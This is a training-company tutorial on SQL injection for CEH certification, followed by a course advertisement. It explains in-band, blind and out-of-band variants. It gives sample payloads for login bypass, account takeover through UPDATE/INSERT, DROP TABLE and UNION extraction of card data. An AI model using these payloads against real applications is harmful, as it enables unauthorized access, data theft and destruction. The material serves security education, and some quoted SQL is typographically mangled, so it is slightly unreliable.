CEH Module 15: SQL Injection
Have you ever wondered how cybercriminals gain control of a website or steal sensitive information? One common and devastating technique they use is called SQL injection. In “CEH Module 15: SQL Injection,” we will explore this powerful attack method. We’ll break down the concepts of SQL injection, demonstrate various types of attacks, and explain the methodologies used by attackers.
What is SQL Injection?
Have you ever entered your information on a website and wondered how safe it is? SQL injection is one of the sneaky tricks cybercriminals use to break into websites and steal data. But what exactly is SQL injection?
Imagine a website with a search box where you type in what you’re looking for. Normally, the website takes what you typed and checks its database for matching information. But if the website isn’t properly protected, a hacker can type in special commands instead of a regular search term. These commands trick the website into giving the hacker access to its database. The attacker can see, steal, or even change the stored data. Scary, right?
SQL injection is a method that takes advantage of a website’s weak points, specifically the parts where the site doesn’t properly check or clean up what users type in. This flaw isn’t in the database or the web server but in how the website handles user input.
Why is SQL Injection Dangerous?
SQL injection can lead to several serious issues, including:
- Authentication and Authorization Bypass: Hackers can log in without a valid username and password, gaining administrative access.
- Information Disclosure: Attackers can retrieve sensitive information stored in the database, such as personal details and financial data.
- Compromised Data Integrity: Hackers can modify or delete data, deface websites or alter important records.
- Compromised Availability of Data: Attackers can delete logs or audit information, making it hard to track their activities.
- Remote Code Execution: In some cases, attackers can execute malicious code on the server, potentially compromising the entire system.
How Does SQL Injection Work?
Structured Query Language (SQL) is a special language used to communicate with databases. It includes commands like INSERT, SELECT, UPDATE, and DELETE, which are used to add, retrieve, modify, and remove data in the database.
Here’s how an SQL injection attack typically works:
- A hacker finds a web application that uses SQL to interact with its database.
- The hacker identifies an input field, like a search box or login form, where they can enter data.
- Instead of typing normal input, the hacker enters a malicious SQL query.
- If the application does not properly check or clean this input, it executes the malicious SQL query.
For example, a hacker might enter:
Username: ‘ OR 1=1 —
Password: anything
This input tricks the database into thinking the condition (1=1) is always true, allowing the hacker to bypass authentication.
Examples of SQL Injection Attacks
Updating Table: A hacker can change the email address associated with an account by injecting a malicious SQL command.
| Attacker SQL Query: blah’; UPDATE jb-customers SET jk-email = ‘info@infosectrain.com’ WHERE email =’jack@springfield.com’; — |
Adding New Records: Attackers can insert new records into a database.
| Attacker SQL Query: blah’; INSERT INTO jk-customers (‘jk-email’,’jk-passwd’,’jk-login_id’,’jk-last_name’) VALUES (‘jack@springfield.com’,’hello’,’jack’,’jack springfield’);– |
Identifying the Table Name: Attackers can guess table names to gain information.
| Attacker SQL Query: blah’ AND 1=(SELECT COUNT(*) FROM mytable); — |
Deleting a Table: Attackers can drop entire tables from the database.
| Attacker SQL Query: blah’; DROP TABLE Creditcard; — |
Types of SQL Injection
In-Band SQL Injection
In-band SQL injection attackers use the same communication channel to perform the attack and retrieve the results. Depending on the technique used, various types of in-band SQL injection attacks exist. The most commonly used in-band SQL injection attacks are error-based SQL injection and UNION SQL injection.
- Error-Based SQL Injection: An attacker deliberately injects malicious inputs into an application to trigger database errors. By examining the error messages returned, the attacker identifies an SQL injection vulnerability within the application. Example:
| Create procedure Login @user_name varchar(20), @password varchar(20) As Declare @query varchar(250) Set @query = ‘ Select 1 from usertable Where username = ‘ ‘ + @user_name + ‘ and password = ‘ + @password exec(@query) Go |
If the attacker enters the following inputs in the application input fields using the above-stored procedure running in the backend, they will be able to log in with any password:
User input: any username or 1=1′ anypassword
- System Stored Procedure: The risk of executing a malicious SQL query in a stored procedure increases if the web application does not sanitize the user inputs used to dynamically construct SQL statements for that stored procedure. An attacker may use malicious inputs to execute the malicious SQL statements in the stored procedure. Attackers exploit databases’ stored procedures to perpetrate their attacks.
- Illegal/Logically Incorrect Query: An attacker may gain knowledge by injecting illegal/logically incorrect requests such as injectable parameters, data types, names of tables, and so on. In this SQL injection attack, an attacker intentionally sends an incorrect query to the database to generate an error message that may be useful for performing further attacks. This technique may help an attacker to extract the structure of the underlying database. Example:
| Username: ‘Joy’ The resultant query will be: SELECT * FROM Users WHERE UserName = ‘joy” AND password = |
After executing the above query, the database may return the following error message:
Incorrect Syntax near ‘joy’. Unclosed quotation mark after the character string ” AND Password=’xxx”.”
- UNION SQL Injection: The “UNION SELECT” statement returns the union of the intended dataset and the target dataset. In a UNION SQL injection, an attacker uses a UNION clause to append a malicious query to the requested query, as shown in the following example:
| SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable |
The attacker checks for the UNION SQL injection vulnerability by adding a single quote character (‘) to the end of a “.php? id=” command. The type of error message received will tell the attacker if the database is vulnerable to a UNION SQL injection.
- Tautology: In a tautology-based SQL injection attack, an attacker uses a conditional OR clause such that the condition of the WHERE clause will always be true. Such an attack can be used to bypass user authentication. Example:
| SELECT * FROM users WHERE name = ” OR ‘1’=’1′; |
This query will always be true, as the second part of the OR clause is always true.
- End-of-Line Comment: In this type of SQL injection, an attacker uses line comments in specific SQL injection inputs. Comments in a line of code are often denoted by (–), and they are ignored by the query. An attacker takes advantage of this commenting feature by writing a line of code that ends in a comment. The database will execute the code until it reaches the commented portion, after which it will ignore the rest of the query. Example:
| SELECT * FROM members WHERE username = ‘admin’–‘ AND password = ‘password’ |
With this query, an attacker can log in to an admin account without the password, as the database application will ignore the comments that begin immediately after username = ‘admin’.
- In-line Comments: Attackers simplify an SQL injection attack by integrating multiple vulnerable inputs into a single query using in-line comments. This type of injection allows an attacker to bypass blacklisting, remove spaces, obfuscate, and determine database versions. Example:
| INSERT INTO Users (UserName, isAdmin, Password) VALUES (‘”. $username.”‘, 0, ‘”.$password.”‘)” |
is a dynamic query that prompts a new user to enter a username and password. The attacker may provide malicious inputs as follows:
| UserName = Attacker’, 1, /* Password = */’mypwd |
After these malicious inputs are injected, the generated query gives the attacker administrator privileges.
| INSERT INTO Users (UserName, isAdmin, Password) VALUES(‘Attacker’, 1, /*’, 0, ‘*/’mypwd’) |
Blind/Inferential SQL Injection
In Blind SQL Injection, the attacker sends malicious SQL queries to the database but does not see the output. Instead, they infer the results based on the application’s behavior. This type can be more time-consuming but is effective.
- Boolean Exploitation: Boolean-based blind SQL injection, also known as inferential SQL injection, involves querying the application database in a way that produces true or false responses. By supplying various statements to the affected parameter in the HTTP request, an attacker can infer information based on the application’s responses. By comparing the response page between both conditions, the attackers can infer if the injection was successful. Example:
| ● URL: http://www.myshop.com/item.aspx?id=67 ● SQL Query: SELECT Name, Price, Description FROM ITEM_DATA WHERE ITEM_ID = 67 ● Manipulated URL: http://www.myshop.com/item.aspx?id=67 and 1=2 ● SQL Query Changes: SELECT Name, Price, Description FROM ITEM_DATA WHERE ITEM_ID = 67 AND 1 = 2 |
- Heavy Query: Attackers use heavy queries to perform a time delay SQL injection attack without using time delay functions. A heavy query retrieves a significant amount of data and takes a long time to execute in the database engine. Attackers generate heavy queries using multiple joins on system tables. Example:
| SELECT * FROM products WHERE id=1 AND 1 < (SELECT count(*) FROM all_users A, all_users B, all_users C) |
Out-of-Band SQL Injection
Out-of-Band SQL Injection is less common and involves using different communication channels to perform the attack and retrieve results. This can involve sending DNS or HTTP requests to the attacker-controlled server. Example: Using DNS and HTTP requests to retrieve data from the database server. For example, in Microsoft SQL Server, an attacker exploits the xp_dirtree command to send DNS requests to a server controlled by the attacker. Similarly, in the Oracle Database, an attacker may use the UTL_HTTP package to send HTTP requests from SQL or PL/SQL to a server controlled by the attacker.
Master CEH with InfosecTrain
SQL injection is one of the most powerful and dangerous hacking techniques, giving cybercriminals a direct path to exploit databases and steal sensitive information. But here’s the deal—if you understand how these attacks work and the different ways they can be executed, you’ll be in a much stronger position to secure web applications and shut hackers down before they strike. Mastering SQL injection defense isn’t just about knowledge—it’s about staying ahead of the game. InfosecTrain’s Certified Ethical Hacker (CEH) course provides in-depth knowledge and hands-on experience to help you master SQL injection techniques and countermeasures, preparing you to defend against these threats.
Take your ethical hacking skills to the next level with InfosecTrain’s CEH training! Gain expertise in SQL injection and other critical security topics. Enroll now and become a Certified Ethical Hacker today!
TRAINING CALENDAR of Upcoming Batches For CEH v13
| Start Date | End Date | Start - End Time | Batch Type | Training Mode | Batch Status | |
|---|---|---|---|---|---|---|
| 24-Feb-2025 | 27-Mar-2025 | 20:00 - 22:00 IST | Weekday | Online | [ Close ] | |
| 02-Mar-2025 | 12-Apr-2025 | 19:00 - 23:00 IST | Weekend | Online | [ Open ] | |
| 23-Mar-2025 | 03-May-2025 | 09:00 - 13:00 IST | Weekend | Online | [ Open ] | |
| 06-Apr-2025 | 24-May-2025 | 09:00 - 13:00 IST | Weekend | Online | [ Open ] |
1800-843-7890 (India) 